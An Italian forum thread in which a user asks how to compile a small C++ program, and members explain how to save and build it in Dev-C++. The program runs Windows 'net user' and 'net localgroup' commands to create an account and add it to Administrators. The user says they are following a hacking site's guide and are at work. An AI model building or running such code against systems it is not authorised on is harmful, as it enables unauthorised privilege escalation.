|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
Junior Member
Iscritto dal: Mar 2009
|
[C++] Come creare eseguibile con compilatore ?
Ciao a tutti,
premetto di non essere una cima nel campo, ma devo creare un eseguibile con il compilatore C++, ho dato uno sguardo a qualche discussione ma nulla di soddisfacente.....devo rendere eseguibile questa stringa: #include <process.h> main () { system("net user NomeUtente Password /add"); system("net localgroup Administrators NomeUtente /add"); system("net localgroup Users NomeUtente /delete"); return 0; } procedo così: apro un nuovo file sorgente e dopo aver copiato la suddetta stringa provo a cliccare sul tasto "compila".....dovrebbe succedere qualcosa di "ecclatante"??????? mi chiede solo di salvare ma nessuna opzione mi riporta il .exe.........che devo fare?????? Il tutto è per seguire le indicazioni riportate da questo sito http://www.spysystem.it/hacker_adminwinnt.htm ma proprio non riesco a creare questo benedetto eseguibile!!!!! Ho provato a scaricare anche il visual ma essendo a lavoro non me lo fà installare........ HELP!!!!! Ultima modifica di kansas107 : 21-03-2009 alle 17:40. |
|
|
|
|
|
#2 |
|
Member
Iscritto dal: Dec 2008
|
compilare significa proprio creare l'eseguibile... quindi devi solo capire dove ti ha messo l'eseguibile...cerca...
|
|
|
#3 | |
|
Junior Member
Iscritto dal: Mar 2009
|
Quote:
Si ok, ma quando clicco su "compila" mi chiede dove salvare il file.......ma nelle scelte del formato da salvare non c'è il .exe.....ci sono solo i formati .dev *.hpp *.rc *.c *.cpp e all files..........qualsiasi formato io scelga non mi crea nessun "eseguibile"........... Aiuuuuuuutooooo
Ultima modifica di kansas107 : 21-03-2009 alle 18:36. Motivo: errore |
|
|
|
|
|
|
#4 |
|
Member
Iscritto dal: Dec 2008
|
Ti chiede dove salvare il file sorgente perche' evidentemente non lo hai fatto prima.Salvalo in .cpp e vedi che poi dovrebbe compilarlo e crearti quindi l'eseguibile.
ps:Ho visto che usi dev-cpp,abbandonalo che e' il demonio materializzato in compilatore
Ultima modifica di Raiki : 21-03-2009 alle 22:59. |
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 19:49.